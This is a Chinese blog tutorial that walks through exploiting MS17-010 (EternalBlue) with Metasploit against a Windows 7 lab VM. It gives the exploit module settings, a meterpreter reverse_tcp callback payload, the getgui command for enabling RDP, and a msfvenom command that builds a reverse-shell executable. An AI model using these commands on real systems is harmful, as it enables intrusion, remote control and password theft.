利用Metasploit控制目标电脑(Win7_x64系统)

介绍

      MSF,是The Metasploit Framework的简称。MSF是一个非常好用的渗透框架,里面集成了许多框架和工具;MSF高度模块化,即框架由多个module组成。进一步解释,是一款开源安全漏洞利用和测试工具,集成了各种平台上常见的溢出漏洞和流行的shellcode,并持续保持更新;metasploit涵盖了渗透测试中全过程,可以在这个框架下利用现有的Payload进行一系列的渗透测试。

MS17-010(永恒之蓝)漏洞简介

      永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。(从EternalBlue这个Exploit被影子经纪人公布到互联网上后,就成为了“明星”。在漏洞被发现的五月中,这个Exploit被多款恶意软件利用。包括肆虐的WannaCryp0t,无文件的勒索软件UIWIX和SMB蠕虫EternalRocks。EternalBlue(在微软的MS17-010中被修复)是在Windows的SMB服务处理SMB v1请求时发生的漏洞,这个漏洞导致攻击者在目标系统上可以执行任意代码)。

    永恒之蓝漏洞是方程式组织在其漏洞利用框架中一个针对SMB服务进行攻击的漏洞,该漏洞导致攻击者在目标系统上可以执行任意代码。

目录

1. 前提

2. 开启模块

3. 查找漏洞

4. 设置模块

5. 设置参数并开始攻击

6. 攻击成功及反馈

7. 获取靶机权限

8. 附加

1. 前提

   ①kali攻击机与Win7系统在同一局域网的同一网段上;

   ②能相互ping通。

    Kali信息:

    网卡使用VMnet8,通过物理机可知:

    Win7信息:

  测试下网络是否能ping通:

 2. 开启模块

     打开kali,利用msf框架进行渗透,先查看kali数据库是否开启:

service postgresql status

    下图为没有开启,还可以设置postgresql,开机自启:

update-rc.d postgresql enable

 3. 查找漏洞

    首先使用namp对靶机(Win7系统)进行扫描,确定445端口是否开启; 

4. 设置模块 

   打开metasploit搜索ms17-010;

  ①进入msfconsole (每次界面随机,不固定)

  ②初始化数据库  msfdb init

  下面直接查找漏洞ms17_010(永恒之蓝就是利用这个漏洞)。

  关注两个:扫描漏洞    auxiliary/scanner/smb/smb_ms17_010;

                    漏洞利用   exploit/windows/smb/ms17_010_eternalblue;

 5. 设置参数并开始攻击

    选择漏洞验证扫描工具并设置参数;

    ①use auxiliary/scanner/smb/smb-ms17-010 利用扫描漏洞,开启模块

    ②show options:查看设置

   ③set rhost 靶机ip(192.168.137.140)

   ④exploit 运行

   选择攻击模块并设置参数;

  ①use exploit/windows/smb/ms17_010_eternalblue //选择模块

  ②options //查看详细信息

   ③set payload windows/x64/meterpreter/reverse_tcp //选择荷载

   ④set rhost 靶机ip(Win7:192.168.137.140)

   ⑤set lhost 攻击机ip(kali:192.168.137.134)

 6. 攻击成功及反馈

    exploit //运行攻击

7. 获取靶机权限

   ①run getgui -e // 开启靶机3389端口(远程桌面用)

   ②查看系统信息、提权添加账户以及获取密码等

   输入shell进入目标系统 shell

   chcp 65001 //解决shell后windows终端乱码

   sysconfig  //查看靶机系统信息

附加:

    当然还有一种方法对Windows系统进行渗透,即Windows操作系统下Meterpreter的使用。

    ① 生成一个被控端payload1.exe,再启动Metasploit

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.137.139 lport=5000 -f exe -o /root/payload1.exe 

  ②成功启动Metasploit之后,执行以下命令,将生成的payload1复制到虚拟机Windows 7中,此时在主控端就可以打开一个Meterpreter控制会话(session)

  ③background命令可将当前会话切换到后台,就可以返回到上一级的模块控制处了;

  sessions命令可显示所有的会话,以查看目标机的信息。

 下面送上两张常用命令的图片

至此,两种方式对靶机已成功渗透。

希望能帮到大家,如果可以解决大家的小问题,麻烦点赞收藏加关注,若有问题评论区留言或私信我。

  • 3
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值